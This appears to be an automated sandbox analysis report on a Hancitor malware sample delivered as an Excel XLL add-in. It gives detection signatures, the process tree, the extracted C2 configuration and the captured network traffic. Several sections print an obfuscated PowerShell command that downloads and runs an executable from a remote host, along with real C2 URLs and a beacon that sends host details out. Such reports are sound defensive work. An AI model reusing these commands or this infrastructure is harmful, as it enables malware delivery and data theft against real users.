
Windows Analysis Report 0708_5355150121.xll

Overview

General Information

Sample Name: 0708_5355150121.xll
Analysis ID: 445958
MD5: 41e0318dfdb1c180a375a7efc712649e
SHA1: f0c230010c7b85544c25879d4daf74479360e1bc
SHA256: 73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71
Tags: dll, xll

Most interesting Screenshot:

Detection

Hancitor
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Hancitor
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files to the user root directory
May check the online IP address of the machine
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6120 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde MD5: 5D6638F2C8F8571C593999C58866007E)
    • mshta.exe (PID: 5756 cmdline: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
      • powershell.exe (PID: 5944 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 5788 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • snd32sys.exe (PID: 2160 cmdline: 'C:\Users\Public\snd32sys.exe' MD5: ED1921467F6784AF6BDCA40A06A541B5)
  • cleanup

Malware Configuration

Threatname: Hancitor

{"Campaign Id": "0707in2_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}

Yara Overview

Memory Dumps

Source: 00000001.00000003.225595145.0000000006590000.00000004.00000001.sdmp, Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Author: Florian Roth
  • 0x18c6a:$s1: poWerSHEll
Source: 00000001.00000003.224640872.0000000002F76000.00000004.00000001.sdmp, Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Author: Florian Roth
  • 0xeee:$s1: poWerSHEll
  • 0x1256:$s1: PowerShell
  • 0x1256:$sr1: PowerShell
  • 0x1256:$sn3: PowerShell
Source: 00000001.00000002.227307568.0000000002F76000.00000004.00000001.sdmp, Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Author: Florian Roth
  • 0xeee:$s1: poWerSHEll
  • 0x1256:$s1: PowerShell
  • 0x1256:$sr1: PowerShell
  • 0x1256:$sn3: PowerShell
Source: 00000001.00000003.225197640.0000000002F76000.00000004.00000001.sdmp, Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Author: Florian Roth
  • 0xeee:$s1: poWerSHEll
  • 0x1256:$s1: PowerShell
  • 0x1256:$sr1: PowerShell
  • 0x1256:$sn3: PowerShell
Source: 00000002.00000002.348453730.0000000004B30000.00000004.00000040.sdmp, Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Author: Florian Roth
  • 0x1563:$s1: powershell
  • 0x1572:$s1: poWerSHEll
  • 0x1563:$sr1: powershell
  • 0x1563:$sn1: powershell

Unpacked PEs

Source: 16.3.snd32sys.exe.12f4305.0.unpack, Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Author: Joe Security
Source: 16.3.snd32sys.exe.12f4305.0.unpack, Rule: Hancitor, Description: Hancitor Payload, Author: kevoreilly
  • 0x54f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Author: Joe Security
Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, Rule: Hancitor, Description: Hancitor Payload, Author: kevoreilly
  • 0x114f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
Source: 16.2.snd32sys.exe.610000.0.unpack, Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Execution from Suspicious Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\snd32sys.exe' , CommandLine: 'C:\Users\Public\snd32sys.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\snd32sys.exe, NewProcessName: C:\Users\Public\snd32sys.exe, OriginalFileName: C:\Users\Public\snd32sys.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5944, ProcessCommandLine: 'C:\Users\Public\snd32sys.exe' , ProcessId: 2160
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started, Author: Michael Haag, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5756, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ProcessId: 5944
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Data: Command: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6120, ProcessCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ProcessId: 5756
Sigma detected: Mshta Spawning Windows Shell
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5756, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ProcessId: 5944
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5756, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ProcessId: 5944

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, Malware Configuration Extractor: Hancitor {"Campaign Id": "0707in2_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}
Multi AV Scanner detection for submitted file
Source: 0708_5355150121.xll, Virustotal: Detection: 23%
Source: 0708_5355150121.xll, ReversingLabs: Detection: 17%
Source: 16.2.snd32sys.exe.610000.0.unpack, Avira: Label: TR/Dropper.Gen

Location Tracking:

Yara detected Hancitor
Source: Yara match, File source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: snd32sys.exe PID: 2160, type: MEMORY
Source: C:\Users\Public\snd32sys.exe, Code function: 16_2_00612CB0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,16_2_00612CB0
Source: C:\Users\Public\snd32sys.exe, Code function: 16_2_00612CF7 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,16_2_00612CF7
Source: C:\Users\Public\snd32sys.exe, Code function: 16_2_00612D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,16_2_00612D78
Source: C:\Users\Public\snd32sys.exe, Code function: 16_2_00612D58 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,16_2_00612D58
Source: C:\Users\Public\snd32sys.exe, Code function: 16_2_00612D35 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,16_2_00612D35

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\Public\snd32sys.exe, Unpacked PE file: 16.2.snd32sys.exe.610000.0.unpack
Source: 0708_5355150121.xll, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: Binary string: c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb source: snd32sys.exe, snd32sys.exe.6.dr
Source: C:\Users\Public\snd32sys.exe, Code function: 16_2_0065838E FindFirstFileExW,FindNextFileW,FindClose,16_2_0065838E
Source: C:\Users\Public\snd32sys.exe, Code function: 16_2_00657FD2 FindFirstFileExW,16_2_00657FD2

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\mshta.exe

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: http://sudepallon.com/8/forum.php
Source: Malware configuration extractor, URLs: http://anspossthrly.ru/8/forum.php
Source: Malware configuration extractor, URLs: http://thentabecon.ru/8/forum.php
Downloads files with wrong headers with respect to MIME Content-Type
        Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Jul 2021 14:30:58 GMT Content-Type: image/jpeg Content-Length: 763392 Connection: keep-alive Last-Modified: Wed, 07 Jul 2021 13:36:32 GMT ETag: "60e5ade0-ba600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 81 0c 63 f0 c5 6d 0d a3 c5 6d 0d a3 c5 6d 0d a3 18 92 c2 a3 c4 6d 0d a3 18 92 c0 a3 c6 6d 0d a3 18 92 c3 a3 d1 6d 0d a3 18 92 c6 a3 d3 6d 0d a3 c5 6d 0c a3 a1 6d 0d a3 18 92 df a3 c0 6d 0d a3 18 92 c4 a3 c4 6d 0d a3 18 92 c1 a3 c4 6d 0d a3 52 69 63 68 c5 6d 0d a3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a3 3c de 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 62 07 00 00 ce 0d 00 00 00 00 00 b0 ac 01 00 00 10 00 00 00 80 07 00 00 00 00 01 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 15 00 00 04 00 00 57 d6 0b 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 75 09 00 b4 00 00 00 00 80 13 00 40 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 15 00 40 47 00 00 70 39 09 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 39 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 60 07 00 00 10 00 00 00 62 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 04 02 00 00 80 07 00 00 06 02 00 00 66 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 ea 09 00 
00 90 09 00 00 5e 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 93 01 00 00 80 13 00 00 94 01 00 00 ca 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 47 00 00 00 20 15 00 00 48 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
May check the online IP address of the machine
Source: C:\Users\Public\snd32sys.exe, DNS query: name: api.ipify.org (three identical queries recorded)
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Jul 2021 14:30:58 GMT Content-Type: image/jpeg Content-Length: 763392 Connection: keep-alive Last-Modified: Wed, 07 Jul 2021 13:36:32 GMT ETag: "60e5ade0-ba600" Accept-Ranges: bytes Data Raw: (identical to the PE-prefixed response body listed above under "Downloads files with wrong headers with respect to MIME Content-Type")
Source: global traffic, HTTP traffic detected: GET /92375234.xml HTTP/1.1 Connection: Keep-Alive Host: srand04rf.ru
Source: Joe Sandbox View, IP Address: 23.21.173.155
Source: Joe Sandbox View, IP Address: 77.222.42.67
Source: Joe Sandbox View, ASN Name: SWEB-ASRU
Source: global traffic, HTTP traffic detected: GET /08.jpg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: srand04rf.ru Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: api.ipify.org Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
